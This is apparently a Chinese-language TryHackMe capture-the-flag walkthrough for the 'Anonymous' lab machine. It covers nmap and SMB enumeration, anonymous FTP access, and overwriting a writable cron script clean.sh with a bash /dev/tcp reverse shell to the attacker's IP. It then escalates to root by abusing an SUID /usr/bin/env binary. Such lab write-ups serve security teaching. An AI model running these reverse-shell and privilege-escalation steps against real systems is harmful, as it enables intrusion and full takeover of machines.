tryhackme-[Anonymous]

0x01.Demo

0x02.信息收集

可以看到开放了4个端口21/22/139/445 其中ftp开放了匿名登入，且目录为scripts

root@JIYE:~/tryhackme/anonymous# nmap -sC -sV -sT 10.10.7.51 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-13 00:46 EST
Nmap scan report for 10.10.7.51
Host is up (0.36s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.248.83
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 2s, median: 0s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2021-01-13T05:48:13+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-13T05:48:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.83 seconds
root@JIYE:~/tryhackme/anonymous#

查看服务共享的资源，发现为pics

root@JIYE:~/tryhackme/anonymous# smbclient -L 10.10.7.51
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
root@JIYE:~/tryhackme/anonymous#

0x03.匿名登入ftp

发现scripts目录下的文件，并下载

root@JIYE:~/tryhackme/anonymous# ftp 10.10.7.51
Connected to 10.10.7.51.
220 NamelessOne's FTP Server!
Name (10.10.7.51:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000          946 Jan 13 05:47 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (3.4820 MB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (989 bytes).
226 Transfer complete.
989 bytes received in 0.57 secs (1.6842 kB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.60 secs (0.1115 kB/s)
ftp>

0x04.查看文件

发现clean.sh作用为删除/tmp下的文件，另外两个文件没有什么有用的东西

root@JIYE:~/tryhackme/anonymous# cat clean.sh 
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
root@JIYE:~/tryhackme/anonymous#

0x05.反弹shell

修改clean.sh并上传，文件内容如下

root@JIYE:~/tryhackme/anonymous# cat clean.sh 
#!/bin/bash
bash -i >& /dev/tcp/10.9.248.83/6666 0>&1

shell利用

对服务器文件进行覆盖

ftp> put clean.sh clean.sh 
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
54 bytes sent in 0.00 secs (1.0098 MB/s)
ftp> 

kali监听端口，使用rlwrap就可以使用键盘上下箭头了

root@JIYE:~/tryhackme/anonymous# rlwrap nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.9.248.83] from (UNKNOWN) [10.10.136.156] 49676
bash: cannot set terminal process group (1144): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
namelessone
ls
ls
pics
user.txt
cat user.txt
cat user.txt
****************************

0x06.提权

使用SUID提权

find / -perm -4000 2>/dev/nul
或者
find / -perm -u=s -type f 2>/dev/null

/usr/bin/env

env提权参考

/usr/bin/env /bin/sh -p
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
ls
pics
user.txt
pwd
/home/namelessone
cd /root
pwd
/root
ls
root.txt
cat root.txt
*************************